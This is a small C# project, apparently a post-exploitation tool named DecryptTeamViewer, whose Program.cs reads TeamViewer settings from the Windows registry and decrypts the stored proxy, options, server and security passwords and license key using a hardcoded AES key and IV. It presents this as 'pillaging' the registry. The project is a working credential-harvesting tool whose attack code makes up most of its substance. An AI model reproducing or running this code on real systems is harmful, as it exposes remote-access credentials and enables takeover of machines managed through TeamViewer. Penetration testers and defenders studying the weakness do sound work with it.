├── DecryptTeamViewer.sln
├── DecryptTeamViewer
├── App.config
├── DecryptTeamViewer.csproj
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
└── README.md
/DecryptTeamViewer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29728.190
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DecryptTeamViewer", "DecryptTeamViewer\DecryptTeamViewer.csproj", "{D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {0C02553C-431C-4BB7-AEC1-3CDC69A660E8}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/DecryptTeamViewer/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/DecryptTeamViewer/DecryptTeamViewer.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D6AAED62-BBFC-4F2A-A2A4-35EC5B2A4E07}
8 | Exe
9 | DecryptTeamViewer
10 | DecryptTeamViewer
11 | v4.6
12 | 512
13 | true
14 | true
15 | publish\
16 | true
17 | Disk
18 | false
19 | Foreground
20 | 7
21 | Days
22 | false
23 | false
24 | true
25 | 0
26 | 1.0.0.%2a
27 | false
28 | false
29 | true
30 |
31 |
32 | AnyCPU
33 | true
34 | full
35 | false
36 | bin\Debug\
37 | DEBUG;TRACE
38 | prompt
39 | 4
40 |
41 |
42 | AnyCPU
43 | pdbonly
44 | true
45 | bin\Release\
46 | TRACE
47 | prompt
48 | 4
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 | False
70 | Microsoft .NET Framework 4.6 %28x86 and x64%29
71 | true
72 |
73 |
74 | False
75 | .NET Framework 3.5 SP1
76 | false
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/DecryptTeamViewer/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using Microsoft.Win32;
4 | using System.Security.Cryptography;
5 |
6 | namespace DecryptTeamViewer
7 | {
8 | class Program
9 | {
10 | static void Main(string[] args)
11 | {
12 | Console.WriteLine("\r\n\r\n=== DecryptTeamViewer: Pillaging registry for TeamViewer information ===\r\n");
13 |
14 | // TeamViewer version
15 | Console.WriteLine("\r\n=== TeamViewer version ===\r\n");
16 | Console.WriteLine(GetRegValue("TeamViewerSettings", "Version"));
17 |
18 | // User info
19 | Console.WriteLine("\r\n=== User Information ===\r\n");
20 | Console.WriteLine("Account name: " + GetRegValue("TeamViewerSettings", "OwningManagerAccountName"));
21 | Console.WriteLine("User email: " + GetRegValue("TeamViewerUserSettings", "BuddyLoginName"));
22 |
23 | // Proxy info
24 | Console.WriteLine("\r\n=== Proxy Information ===\r\n");
25 | Console.WriteLine("Proxy IP: " + GetRegValue("TeamViewerSettings", "Proxy_IP"));
26 | Console.WriteLine("Proxy username: " + GetRegValue("TeamViewerSettings", "ProxyUsername"));
27 | var proxyPass = (byte[])GetRegValue("TeamViewerSettings", "ProxyPasswordAES");
28 | Console.WriteLine("Proxy password: " + DecryptAES(proxyPass));
29 |
30 | // Credentials
31 |
32 | Console.WriteLine("\r\n=== Decrypted Credentials ===\r\n");
33 | // Options pass
34 | var optionsPass = (byte[])GetRegValue("TeamViewerSettings", "OptionsPasswordAES");
35 | Console.WriteLine("TeamViewer options password: " + DecryptAES(optionsPass));
36 | // Server pass
37 | var serverPass = (byte[])GetRegValue("TeamViewerSettings", "ServerPasswordAES");
38 | Console.WriteLine("TeamViewer server password: " + DecryptAES(serverPass));
39 | // Security pass
40 | var securityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordAES");
41 | var exportedSecurityPass = (byte[])GetRegValue("TeamViewerSettings", "SecurityPasswordExported");
42 | Console.WriteLine("TeamViewer security password: " + DecryptAES(securityPass));
43 | Console.WriteLine("TeamViewer exported security password: " + DecryptAES(exportedSecurityPass));
44 | // License
45 | var licenseKey = (byte[])GetRegValue("TeamViewerSettings", "LicenseKeyAES");
46 | Console.WriteLine("TeamViewer license key: " + DecryptAES(licenseKey) + "\n");
47 |
48 | }
49 | public static object GetRegValue(string hive, string value)
50 | {
51 | // Gets registry values from TeamViewer keys
52 | Object regKeyValue = new Object();
53 | if (hive == "TeamViewerSettings")
54 | {
55 | var regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\WOW6432Node\TeamViewer", false);
56 | if (regKey != null)
57 | {
58 | regKeyValue = regKey.GetValue(value);
59 | }
60 | return regKeyValue;
61 | }
62 | else if (hive == "TeamViewerUserSettings")
63 | {
64 | var regKey = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\TeamViewer", false);
65 | if (regKey != null)
66 | {
67 | regKeyValue = regKey.GetValue(value);
68 | }
69 | return regKeyValue;
70 | }
71 | else
72 | {
73 | regKeyValue = null;
74 | return regKeyValue;
75 | }
76 | }
77 |
78 | public static string DecryptAES(byte[] encryptedPass)
79 | {
80 | try
81 | {
82 | // AES settings
83 | Aes aes = new AesManaged
84 | {
85 | Mode = CipherMode.CBC,
86 | BlockSize = 128,
87 | KeySize = 128,
88 | Padding = PaddingMode.Zeros
89 | };
90 | // TeamViewer Key & IV
91 | byte[] key = new byte[16] { 0x06, 0x02, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00 };
92 | byte[] IV = new byte[16] { 0x01, 0x00, 0x01, 0x00, 0x67, 0x24, 0x4F, 0x43, 0x6e, 0x67, 0x62, 0xf2, 0x5e, 0xa8, 0xd7, 0x04 };
93 |
94 | // Decrypt AES passwords
95 | ICryptoTransform AESDecrypt = aes.CreateDecryptor(key, IV);
96 | if (encryptedPass != null)
97 | {
98 | var decrytedPass = AESDecrypt.TransformFinalBlock(encryptedPass, 0, encryptedPass.Length);
99 | string plaintextPass = Encoding.Unicode.GetString(decrytedPass);
100 | return plaintextPass;
101 | }
102 | else
103 | {
104 | return null;
105 | }
106 | }
107 | catch (Exception)
108 | {
109 | return null;
110 | }
111 | }
112 |
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/DecryptTeamViewer/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DecryptTeamViewer")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DecryptTeamViewer")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d6aaed62-bbfc-4f2a-a2a4-35ec5b2a4e07")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # DecryptTeamViewer
2 | Enumerate and decrypt TeamViewer settings from registry
3 |
4 | ## Usage
5 | .\DecryptTeamViewer.exe
6 |
7 | 
8 |
--------------------------------------------------------------------------------